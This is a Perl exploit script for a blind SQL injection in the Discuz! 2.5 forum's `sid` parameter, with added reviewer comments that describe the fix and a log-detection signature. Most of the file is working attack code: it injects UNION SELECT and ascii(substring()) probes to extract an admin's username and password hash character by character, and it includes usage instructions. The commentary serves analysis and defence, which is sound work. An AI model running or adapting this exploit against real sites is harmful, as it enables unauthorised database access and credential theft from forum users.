#!/usr/bin/perl
#Discuz! 2.5 $sid SQL injection exploit
#Need magic_quotes_gpc = Off
#Bug Found By SuperHei_at_www.4ngel.net
#The codz base on 1dt.w0lf(rst.void.ru)'s codz Thx!
#
#C:\Perl\bin>dz3.pl http://127.0.0.1/Discuz!_2.5F_gb/upload 1
#Please wait...
#[||||||||||||||||||||||||||||||||||||||]
#
#------------------x REPORT x-------------------
# Uid: 1
# Username: admin
# Password Hash: 25f9e794323b453885f5181f1b624d0b
#------------------x REPORT x-------------------
#total requests: 326

# Overview for reviewers (defender's reading of this historical PoC):
# The script recovers one record of the cdb_members table (username and
# password hash) one character at a time, using boolean responses to a
# UNION SELECT injected through the unescaped `sid` query parameter of
# index.php.  The header states the precondition: the quote in `sid='`
# must reach the SQL statement unescaped (magic_quotes_gpc = Off); the
# application-side fix is to bind `sid` as a query parameter (or reject
# anything that is not a well-formed session id) rather than interpolate it.
# Detection: every probe is one GET-style URL containing
# `sid=' union select` followed by an `ascii(substring(...))` comparison,
# and a single run issues hundreds of such requests against the same
# script (the sample above reports 326), which stands out in access logs.
#
# NOTE(review): no `use strict; use warnings;` - every variable below except
# the `my` copies inside the subs is a package global, and the subs pass
# their result back through the global $char rather than return values.

use LWP::UserAgent;

$path = $ARGV[0];        # base URL of the forum (first CLI argument)
$uid = $ARGV[1];         # uid of the member row to read (second CLI argument)
$string = "to:";         # marker grepped for in the response body; its presence is
                         # treated as "condition true" - presumably text the target
                         # page renders only when the injected query succeeds; unverified here
$s_num = 1;              # 1-based position of the character currently being recovered
$n=0;                    # running count of HTTP requests, printed in the final report
$|++;                    # unbuffer STDOUT so the progress bar appears as it is built

if (@ARGV < 2) { &usage; }

print "Please wait...\r\n";
print "[";

# Main loop: recover CONCAT(username, ':', Password) position by position.
# found() searches the ASCII range 0..122 for the byte at $s_num and stores it in
# the global $char; a value of 0 (the substring past the end of the string) ends
# the loop.  Note that `==` is numeric, so an undef $char (no match found) also
# compares equal to "0" and terminates the loop.
while(1) {
    &found(0,122);
    if ($char=="0") {
        print "]\r\n\r\n";
        # the username and hash were concatenated with CHAR(58) (':') server-side,
        # so split on the first ':' to separate them again
        ($res1,$res2)=split(":",$allchar);
        #
        print "------------------x REPORT x-------------------\r\n";
        print " Uid: $uid\r\n";
        print " Username: $res1\r\n";
        print " Password Hash: $res2\r\n";
        print "------------------x REPORT x-------------------\r\n";
        print "total requests: $n\r\n";
        exit();
    }
    else {
        print "|";                   # one bar segment per recovered character
        $allchar .= chr($char);
    }
    $s_num++;
}

# found(FMIN, FMAX)
# Binary search over the half-open value range [FMIN, FMAX) for the byte at
# position $s_num, narrowing with one ">R" probe per step and handing ranges
# smaller than 5 to crack() for a linear scan.  The result is stored in the
# global $char (and returned only from the base case; recursive branches pass
# back whatever the nested call evaluated to).  Uses the globals $r and $check.
# NOTE(review): the ($$) prototype does not validate arguments - it is bypassed
# entirely by the `&found(...)` call style used throughout this file.
sub found($$) {
    my $fmin = $_[0];
    my $fmax = $_[1];
    if (($fmax-$fmin)<5) {
        $char=&crack($fmin,$fmax);
        return $char;
    }
    $r = int($fmax - ($fmax-$fmin)/2);   # midpoint of the current range
    $check = ">$r";
    if ( &check($check) ) {
        &found($r,$fmax);                # byte is greater than $r: search the upper half
    }
    else {
        &found($fmin,$r+1);              # byte is <= $r: search the lower half (inclusive of $r)
    }
}

# crack(CMIN, CMAX)
# Linear scan of [CMIN, CMAX): one "=I" probe per candidate value.  Returns the
# matching value, or an empty list/undef when no candidate matches (the caller
# then sees $char == 0 and treats it as end of string).  Uses the globals $i
# and $crcheck.
sub crack($$) {
    my $cmin = $_[0];
    my $cmax = $_[1];
    $i = $cmin;
    while ($i<$cmax) {
        $crcheck = "=$i";
        if ( &check($crcheck) ) {
            return $i;
        }
        $i++;
    }
    return;
}

# check(COMPARISON)
# Issues one HTTP request whose query string carries the injected statement,
# with COMPARISON (">R" or "=I") appended to the
# ascii(substring(CONCAT(username,CHAR(58),Password), $s_num, 1)) expression.
# Returns 1 if the response body contains $string, 0 otherwise.  Increments the
# global request counter $n.
# Observations: the payload is in the URL even though LWP's post() is used, so
# it is fully visible in the target's access log; `@results = $res->content`
# stores the whole body as a single list element, so $size is only ever 0 or 1.
sub check($) {
    $n++;
    $ccheck = $_[0];
    $http_query = $path."/index.php?sid=' union select null,null,null,null,null from cdb_members where uid=".$uid." AND ascii(substring(CONCAT(username,CHAR(58),Password),".$s_num.",1))".$ccheck." 
/*";
    # print "\r\n $http_query \r\n";
    $mcb_reguest = LWP::UserAgent->new() or die;   # a fresh user agent per probe
    $res = $mcb_reguest->post($http_query);        # POST with an empty body; everything is in the URL
    @results = $res->content;
    @num=grep /$string/, @results;
    $size=@num;
    if ($size > 0) {
        return 1;
    }
    return 0;
}

# usage()
# Prints the banner and invocation syntax to STDOUT and exits; called when fewer
# than two command-line arguments are given.
sub usage {
    print "=========================================================\r\n";
    print " Discuz! 2.5 \$sid SQL injection exploit\r\n";
    print " Need magic_quotes_gpc = Off \r\n";
    print "=========================================================\r\n";
    print " Usage: $0 [bbspath/] [uid]\r\n";
    print " e.g. : $0 http://127.0.0.1/bbs 1\r\n";
    print "=========================================================\r\n";
    exit();
}